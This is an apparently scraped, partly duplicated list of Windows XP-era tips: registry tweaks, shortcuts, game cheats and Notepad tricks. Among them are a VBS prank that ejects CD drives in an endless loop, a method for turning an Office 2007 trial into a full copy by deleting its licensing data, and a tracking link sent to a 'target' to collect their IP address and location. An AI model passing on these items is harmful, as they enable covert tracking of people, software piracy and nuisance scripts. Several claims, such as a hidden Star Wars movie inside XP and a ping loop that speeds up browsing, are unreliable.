1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
49.All windows games cheats and cracks
1 ) Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
2)Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting.
windows games tricks
4)Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
5)FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game
If you are getting unwanted multiple boot screen
Then Follow these Steps.
1> Right Click on My Computer
2>Select Properties
3>Select Advanced Tab
4>Select Settings In the Startup & Recovery Section(3rd grp)
5>Select the operating system which u want.
6>And Click OK.
7>Further again press the setting and click on Edit.
8>It will open boot.ini File.
9>Now u can delete those o/s which you don't want to be displayed.
32.Make some short-cut ..make ur life easy.right click -->new--> short-cut n type
1.To lock The Computer :
>> Create a shortcut with the path rundll32.exeuser32.dll,LockWorkStation.
>> The Windows key + L is also a shortcut to this feature.
2.Creating The Suspend Shortcut:
Right click on the Desktop .New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState . Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend.
3.Access The Task Manager Easier :
>>You can make a shortcut that points to %windir%\system32\taskmgr.exe Use key combinations
Ctrl+Shift+Esc
33.To change Drive Letters:
To change Drive Letters:
Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition
34.lock any folder in XP
Lock any folder without using any software
1. Suppose you have a folder named anjali_sharma in D:\anjali_sharma.
2. In the same drive next to the folder create a new notepad file with the exact statement
ren anjali_sharma anjali_sharma.{21EC2020-3AEA-1069-A2DD-0
8002B30309D}
3. Now save this text file as loc.bat
4. Create another notepad file and type
ren anjali_sharma.{21EC2020-3AEA-1069-A2DD-08002B30309D} anjali_sharma
5. Save this as key.bat
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .
7. To open the folder double click key.bat and you get back your original folder.
8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click..
35.Create your own run command
Win+R to open the Run dialog
Enter %windir% to open the Windows directory
Alt+F W S to open the File menu, choose the New menu item, then the Shortcut menu item
Go through the wizard to create a shortcut to the desired program
The name you give the shortcut is what you type in the Run dialog to start the program
36.
Get Any Thing From Google
Songs
javascript:Qr='';if(!Qr){void(Qr=prompt(
'ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Ebook
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER Application NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
game
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER GAME NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Just copy these javascript and paste this in addrss bar and enter the details
37.Copy the following code in note pad and save it with extension anjali.vbs
just try thisonce
'code start from here:-
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here
to end it go to taskmanager then
processes tab then end the wscript
38.Download Youtube Video without any software
javascript:b=fullscreenUrl;g=b.indexOf("
t=");d=b.indexOf("&hl");h=b.substring(g,d);link="h ttp://www.youtube.com/get_video?video_id=" + pageVideoId + "&" + h;location=(link);void(0)
JUST ADD THIS SCRIPT ON ADDRESS BAR OF YOUTUBE VIDEO
AND HIT ENTER..u hav the save option now ...just save ur video n play in any flv player or vlc
39.wannt to c ur own password without help of any unmasking software...just run this java script.
javascript: alert(document.getElementById('Passwd').
value);
Paste this in your address bar where you login after writting your login press enter and then you can see the Password.
40.Keyboard Shortcuts for Internet Explorer
To Select all items on a webpage use CTRL and A.
To Copy a selected item to the clipboard use CTRL and C.
To Paste an item from the clipboard into a document use CTRL and V.
To Add the current page/document to your favorites use CTRL and D.
To Open the IE search utility use CTRL and E.
To Open the FIND box to search the current document use CTRL and F.
To Open the History utility use CTRL and H.
To Open the Favorites utility use CTRL and I.
To Go to a new location/document use CTRL and L. Also CTRL and O.
To Open a new Explorer window use CTRL and N.
To Print the current page/document use CTRL and P.
To Refresh the current page/document use CTRL and R. Also you can use the F5 key.
To Save the current document/page use CTRL and S.
To Close the current Explorer window use CTRL and W.
These are achieved by holding down and pressing a combination of keys
To go to your default homepage use ALT and the HOME key.
To go forward one page (equivalent to the FORWARD button) use ALT and the right arrow key.
To go back one page (equivalent to the BACK button) use ALT and the left arrow key.
Type URL without a Mouse Click
In IE you can use Alt + D key combination to highlight the address bar.
41.
Code:
http://www.google.com/translate?langpair=en|en&u=www.(website
name which is currently not available).com
(where site.com is the site that you wish to visit)it is also useful to retrive some information from net which is currently not available.
42.Increase ur internet speed
goto run
type cmd
type ipconfig/all
note ur dns server ip
then again goto run
type ping -t
dont close the black window till u r using internet...
this trick actually forces data transfer making u browse faster..
u can typ the above ping command in a notepad file and save it as smthing.bat
now u just have to double click on the file
no gurannate this will increase ur speed but u can try this..
43.Hidden Movies in Windows XP...
Hey guyz, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter
try it if it works or not...n inform me too...
44.Some Notepad Trick
Trick1
1. Open a blank Notepad file
2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.
3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. Type your notes and then save and close the file.
After that open the file and see the changes.
by this trick u can also use ur notebook as a personal diary.
Trick2
1.open notepad
2. type "bush hid the facts"
3. save it and close it...
4 then open it again........n see the changes...............
Trick3
Do you know the number of the flight that was used to attack the world Trade Centre????
The flight number was Q33N.
Now, open your Notepad, type the number of the flight (i.e. Q33N).
Now click on format>font, increase the font size upto 72, and change the font style to 'wingdings'. Now see the ammmaaazzzing thing.
Trick4
Over at WinCustomize, someone thought they'd found an Easter Egg in the Windows Notepad application. If you:
1. Open Notepad
2. Type the text "this app can break" (without quotes)
3. Save the file
4. Re-open the file in Notepad
Notepad displays seemingly-random Chinese characters, or boxes if your default Notepad font doesn't support those characters.
It's not an Easter egg (even though it seems like a funny one), and as it turns out, Notepad writes the file correctly. It's only when Notepad reads the file back in that it seems to lose its mind.
45.Mouse click/keyboard modifier combinations
• SHIFT+right click: Displays a shortcut menu containing alternative commands
• SHIFT+double click: Runs the alternate default command (the second item on the menu)
• ALT+double click: Displays properties
• SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin
46.
General keyboard-only commands
• F1: Starts Windows Help
• F10: Activates menu bar options
• SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
• CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
• CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
• ALT+DOWN ARROW: Opens a drop-down list box
• ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
• SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
• ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
• ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
• CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
• ALT+underlined letter in menu: Opens the menu
• ALT+F4: Closes the current window
• CTRL+F4: Closes the current Multiple Document Interface (MDI) window
• ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)
Shell objects and general folder/Windows Explorer
•ALT+esc to switch between open programmes
47.Want to increase the font n images of any website pages(ZOOM IN N ZOOM out)...simply press ctrl and plus(+) button and u will notice the page will maginfy and if u want the font to be small simply press ctrl and minus(-) button...font will begin to reduce.just we use this button in photoshop
48.Hide Your Files In A JPEG
Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
Ok, lets begin…
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
49.All windows games cheats and cracks
1 ) Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
2)Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting.
windows games tricks
4)Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
5)FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game
1-30 awesome collection .computer personal must know
1]Disabling Display of Drives in My Computer
To disable the display of local or networked drives when you click My
Computer go to : HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion
\Policies\Explorer
Now in the right pane create a new DWORD item and name it
NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal)
Now press F5 to refresh. When you click on My Computer, no drives
will be shown. To enable display of drives in My Computer, simply
delete this DWORD item. It's .reg file is as follows:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersio
n\Policies\Explorer]
"NoDrives"=dword:03ffffff
2.Pop a banner each time Windows Boots
To pop a banner which can contain any message you want to
display just before a user is going to log on, go to the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndows\CurrentVers
ion\WinLogon
Now create a new string Value in the right pane named
LegalNoticeCaption and enter the value that you want to see in the
Menu Bar. Now create yet another new string value and name it:
LegalNoticeText. Modify it and insert the message you want to
display each time Windows boots. This can be effectively used to
display the company's private policy each time the user logs on to
his NT box. It's .reg file would be: REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVer
sion\Winlogon]
"LegalNoticeCaption"="Caption here."
3.Customizing the Right Click Context Menu of the Start Menu
When you right click on the start menu, only 3 options pop up:
Open, Explore, and Find. You can add your own programs to this
pop up menu( which comes up when we right click on it.) Open
Regedit and go to the following registry key:
HKEY_CLASSES_ROOT\Directory\Shell
Right click on the shell and create a new Sub Key (You can create a
new SubKey by right clicking on the Shell Key and selecting New >
Key.). Type in the name of the application you want to add to the
start menu. I want to add Notepad to the Start Menu and hence I
name this new sub key, Notepad. Now right click on the new
registry key that you just created and create yet another new key
named Command. Enter the full path of the application, in this case
Notepad in the default value of Command in the right
pane. So I Modify the value of the default string value and enter the
full pathname of Notepad:
c:\wndows\notepad.exe.
Now press F5 to refresh. Now if you right click on the Start Button
you will find a new addition to the Pop Up Menu called Notepad.
4.There is away of accessing restricted
folders.DOS has a lovely command known
as START. Its general syntax is:
START application_path
It does do what it seems to do, start applications. So in you have
access to DOS then you can type in the START command to get
access to the restricted folder.
5. In Windows you can
create shortcuts to almost anything from a file, folder to a Web
URL.
c:\windows\system folder and you need to access it. What do you
do? Simply create a Shortcut to it. To do this right click anywhere
on the desktop and select New > Shortcut. A new window titled
Create Shortcut pops up. Type in the path of the restricted folder
you wish to access, in this case c:\windows\system. Click Next,
Enter the friendly name of the Shortcut and then click Finish. Now
you can access the restricted folder by simply double clicking on the shortcut icon
6.Colorful Background
Don't like the boring background colors of Outlook Express? To
change it launch the Windows Registry Editor and scroll down to the
HKEY_CURRENT_USER\Software\Microsoft\Int
ernet Mail And News
key.
On the left pane, click on ColorCycle or select Edit and Modify in the
menu. Now change the value to 1. Close and restart. Now, launch
Outlook Express and whenever you open up a New Message, hold
down ctrl-shift and tap the z key to scroll to change the background
color. Repeat the keystroke to cycle through the colors.
7.Deleting System Options from the Start menu
You can actually remove the Find and Run options from the start
menu by performing a simple registry hack. Again like always
Launch the registry editor and scroll down to the below key:
HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion
\Policies\Explorer
Right-click on the right pane and select New, DWORD Value. Name
it NoFind.(To remove the RUN option name it NoRun). Double-click
the newly create DWORD to edit it's value and enter 1 as its value.
This will disable the FIND option of the Start Menu and will also
disable the default Shortcut key(F3 for Find.)
8.Object Class identifier
Shell folders(CLSID)
ActiveX Cache {88C6C381-2E85-11D0-94DE-444553540000}
Computer Search Results {1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}
History {FF393560-C2A7-11CF-BFF4-444553540000}
Internet Explorer {871C5380-42A0-1069-A2EA-08002B30309D}
My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents {450D8FBA-AD25-11D0-98A8-0800361B1103}
My Network Places {208D2C60-3AEA-1069-A2D7-08002B30309D}
Offline Files {AFDB1F70-2A4C-11D2-9039-00C04F8EEB3E}
Programs {7BE9D83C-A729-4D97-B5A7-1B7313C39E0A}
Recycle Bin {645FF040-5081-101B-9F08-00AA002F954E}
Search Results {E17D4FC0-5564-11D1-83F2-00A0C90DC849}
Shared Documents {59031A47-3F72-44A7-89C5-5595FE6B30EE}
Start Menu {48E7CAAB-B918-4E58-A94D-505519C795DC}
Temporary Internet Files {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Web {BDEADF00-C265-11D0-BCED-00A0C90AB50F}
Control Panel folders
Administrative Tools {D20EA4E1-3957-11D2-A40B-0C5020524153}
Fonts {D20EA4E1-3957-11D2-A40B-0C5020524152}
Network Connections {7007ACC7-3202-11D1-AAD2-00805FC1270E}
Printers and Faxes {2227A280-3AEA-1069-A2DE-08002B30309D}
Scanners and Cameras {E211B736-43FD-11D1-9EFB-0000F8757FCD}
Scheduled Tasks {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Control Panel icons
Folder Options {6DFD7C5C-2451-11D3-A299-00C04F8EF6AF}
Taskbar and Start Menu {0DF44EAA-FF21-4412-828E-260A8728E7F1}
User Accounts {7A9D77BD-5403-11D2-8785-2E0420524153}
Add Network Places {D4480A50-BA28-11D1-8E75-00C04FA31A86}
Briefcase {85BBD920-42A0-1069-A2E4-08002B30309D}
E-mail {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0}
Help and Support {2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
Internet {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0}
Network Setup Wizard {2728520D-1EC8-4C68-A551-316B684C4EA7}
Run {2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
Search {2559A1F0-21D7-11D4-BDAF-00C04F60B9F0}
Windows Security {2559A1F2-21D7-11D4-BDAF-00C04F60B9F0}
To restore the Run or find command modify the value of the
DWORD to 0 or simply Delete the DWORD value.
9.Some users don't like having to log on to Windows XP. When they restart the computer, they want it
to boot all the way to the desktop without stopping at the Log On To Windows dialog box along the
way.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon is where you configure the
ability to log on to Windows XP automatically. First you set the REG_SZ value AutoAdminLogon to
1, which turns on this feature. Just remember that this is a REG_SZ value and not a REG_DWORD
value. Next set the values DefaultUserName and DefaultPassword to the user name and password
that you want to use to log on to the operating system. Both are REG_SZ values. Last, set the
REG_SZ value DefaultDomainName to the name of the domain that's authenticating your name and
password. Table below summarizes these values, which you create if they don't already exist.
Table ANJALI: Values in Winlogon
Name Type Data
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
AutoAdminLogon REG_SZ 0 | 1
DefaultUserName REG_SZ Name
DefaultDomainName REG_SZ Domain
DefaultPassword REG_SZ Password
10.change ur processor name
Trick - SHOW YOUR PC PENTIUM 5,6....OR MORE...
GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISC
RIPTION>
SYSTEM>CENTRAL PROCESSOR>
ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX
1.Change the name of your internet explorer
Change The Title Of Internet Explorer
Customize ur Internet Explorer
1. Open Registry Editor
2. Move to the following key.
3. HKEY_CURRENT_USER\Software\Microsoft\Int
ernet. Explorer\Main.
4. In the Right Panel look for the string "Window Title" and change its value as u wish. If the String value is not there create a New String value and assign the value as your wish.
12.Make your start menu to work 100% faster.
step1 : press windows key+ r
step2: type regedit on the run box
step3: select HKEY_CURRENT_USER
step4: below this select the Control panel
step5: Choose Desktop
step 6: in the right window you can able to see this MenuShowDelay click this and change the 400 value to 0 thats it
step 7: Restart your computer
13.Convert Trail to Full Office 07
follow these steps...
start -> run .. type regedit ->HKEY_LOCAL_MACHINE -> software -> microsoft -> office -> 12.0 ->
registration -> (clik on the first number series) -> now select (DigitalProductID,LicenseType,TrialType)
and press 'del' key to delete them and then exit registry....
now open C:\Program Files\Common Files\Microsoft Shared\Office12\Office Setup Controller\Proof.en ...
now open the Proof file(XML Document) in it with NOTEPAD ....
now under the last line u wil find ....
now replace "" with "neverinstalled" ...(including the inverted commas
too)....
pls be careful while editing them...
14.Renaming The Start Button:
To rename the start button, you will need a hex editor.(ultraEdit)
Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to explorer.org
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.
Note: If the partition is NTFS and you can't access the files from DOS:
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
Change the value of Shell from Explorer.exe to explorer_1.exe.
15.Removing the Recycle Bin from the Desktop:
If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together. Run Regedit and go to:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Wi
ndows/CurrentVersion/explorer/Desktop/NameSpace
16.Adding Administrative Tools Icon To The Desktop:
Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Desktop\NameSpace . Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor.
17. HIDE ALL DESKTOP ICONS
HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\Explorer
NoDesktop (DWORD value):
Set to 1 to hide all icons.
Delete NoDesktop to undo.
Hit F5 to refresh the desktop.
Hide Network Neighborhood, My Network Places (9x)
Run Poledit.exe (You may have to install it: It is on your Windows CD in\tools\reskit\netadmin\poledit).
File > Open Registry > (double click) Local User > Shell > Restrictions
Check Hide Network Neighborhood or/and My Network Places
OK > File > Save
Reboot.
18.Open g-talk as much as u wish in single pc and chat with different login.
Just follow the simple steps Below:
1)Right click on the Google Talk shortcut.
2)click on Properties.
3)Go to Shortcut tab on Google Talk Properties window.
4)On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).“c:\program files\google\google talk\googletalk.exe” /nomutex
5)Click on OK.
19.GMail drive.. Chk it out.. Things you need to have:
1) gmail account
Download Gmail Drive from
Code:
http://www.softpedia.com/progDownload/GMail-Drive-shell-extension-Download-15944.html
ii) Install the software.
iii) After installing, a drive named gmail drive will be created in My Computer .
iv) double click on this drive, login to gmail account.
v) Whatever content you copy to this drive will be sent to your mail account as attachment, you have logged in
20.the below steps to format pen drive in NTFS File System.
a. Insert USB drive in your PC
b. Goto Device Manager
c. Select Disk Drives and expand
d. Right Click on USB drive and select Properties
e. Goto policies tab and select Optimize for performance and press OK
f. Open My Computer, Click on USB Drive and select Format Opton
Now you can have NTFS option there.
or do the following:
1. Go to Start ->Run -> cmd and press enter.
2. Type convert X: /FS:NTFS ( Where X is your Pen Drive Letter)
The File System is now converted to NTFS. Now its time to enable compression:
1. Go to My Computer and Right Click on your Pen Drive Icon and select Properties.
2. Select Compress Drive to Save Disk Space and then OK.
3. Then Select Apply To Sub Folders and Files and select ok ( if Asked)
All Done, the free space of the pen drive will increase and if you copy anything in the drive it will take less space.
21.Some Important Run commands ...
directly open 'Run' by pressing Windows+R keys at a time.
command - to run MS - DOS (.com, .pif)
calc - to run calculator (.exe)
control - to open Control Panel (.exe)
defrag - to defrag the hard disk drives (.exe)
dialer - for dialing seups (.exe)
dosprompt - to get a minimized DOS window (.pif)
explorer - to open Windows Explorer (.exe., .scf)
ftp - for File Transfer Protocol if internet is connected (.exe)
ms-dos~1/ms-dos~2 - for fully MS-DOS mode.
No Windows O.S. (.pif)net - for net information cum help (.exe)
ping - for bytes information and bandwidth of internet connection information (.exe)
regedit - to open Registry (.exe)
telnet - command runner if the system is conncected in a UNIX system network (.exe)
tuneup - for Task Scheduling wizard, i.e. Task Maintanance (.exe)
notepad - to run Notepad (.exe)
write - to run Wordpad (.exe)
scanregw - to scan the Registry and to backup it (.exe)
progman - to maintain, run and view the files in all drives (.exe)
directcc - to join your computer in cable conncetion with other computers (.exe)
scandskw - to open Scandisk to scan the hard drives (.exe)
winfile - Windows File Managertaskman - to manage current running open programs or files.Nice replacement for default Windows taskbar
msconfig - to maintain the configuration of computer. It will show the options like General, Startup including files Autoexec.bat, Config.sys, System.ini and Win.ini. (Autoexec.bat & Config.sys are MS-DOS files)
winrep - to run Windows Report Tool - Accessories>System Tools>System Information (.exe)winver - to know the version of Windowspackager - insert objects in documets, presentations or worksheets
winfile - another Windows Explorer (.exe)
clipbook - a simple utility that allws you to save and recall several pages or graphics. (.exe)sysedit - view or edit system files from within one window (.exe)
22.CREATE A FOLDER WITHOUT ANY NAME & without icon totally invisible
create a folder without any name...
just type these codes while renaming the folder n press enter once...
alt+0160
OR
alt+255
Now time to hide the folder, to hide a folder first select the folder then right click and go to properties, in properties select the change icon option ...now u can c a lot of folder icon.(C:\Windows\system32\imageres.dll).
.u look for a blank icon select any of the 3 blank icon. click ok then apply u will c invisible folder...(now with no name and no icon too..secret)
23.TRACKING IN YAHOO WHILE CHATTING CHECK THIS OUT
TRACKING IN YAHOO WHILE CHATTING CHECK THIS OUT
TRACK WHILE CHATTING IN YAHOOOOOO
Hear is the tric
1)open this link
Code:
http://shivampatel.net/trace
2)type ur id on the text box give
3)open ur yahoo id u will get a mail regarding this……
4)while chatting in yahoo send this link
Code:
http://acmepeers.com/?u=omo
to the target and allow them to click it
5)PERSON TRACKED…u will get mail regarding country ,city,latitude longtidue, IP ADDRESS,about his system…
24.To use USB Pendrive as RAM in Vista:
Connect the Pendrive to the Computer.
Right click on the Drive and select Properties.
Go to Readyboost tab. There you can see the options for using it as Ram.
25.TRICK THAT INFORMS U THAT CAPSLOCK KEY IS ON
it will alert you when your finger taps the Caps Lock key?
With this tip, I'll show you how to make your computer beep & flash the next time it happens.
The first thing you need to do is get the computer to beep when you hit the Caps Lock key. Here's how:
1. Click the Start button, Settings, Control Panel (XP Users, hit the Start button, Control Panel). Open the Accessibility Options Icon.
2. On the Keyboard tab, click the "Use Toggle Keys" checkbox.
That's it for the beeping part. (OK )
Next, we need to get your screen to flash you, err, flash at you.
HOW TO DO THIS
1. From the Accessibility Options screen, click the Sound tab and check the "Use SoundSentry" checkbox.
2. Next click the Settings button and select "Flash active window" from the "Warning for windowed programs" drop down box.
That's it. Hit OK until you're clear of property and settings screens.
TO SEE IT WORKING
Open your favorite word processor and hit your Caps Lock key.
26.format your computer via your hdd
the limitation is that u should have a OS previously installed and u can't format c drive except from it u can format all other drives
make a image of your xp sp2 in your hdd or borrow it from someone in your pen drive and mount this image via demon tool,alchohal, clone cd or any other virtual drive
now double click it
a windows appears and ask u what do u want to do
select install windows xp professional/home edition
now a new windows open in that click next and it will ask for key
give the key
click next
now a option comes copy files in here click copy files in hard disk
now press next
it will start copying file in your hdd
and restart the windows
now follow the normal procedure
and now u can format your any drive (if it has OS also u can format)
27.how to make image
use nero to make image or you can also use any iso maker
or use alchohal,clone cd etc
to make image via nero insert your disk and open nero
go to backup tab and choose copy cd
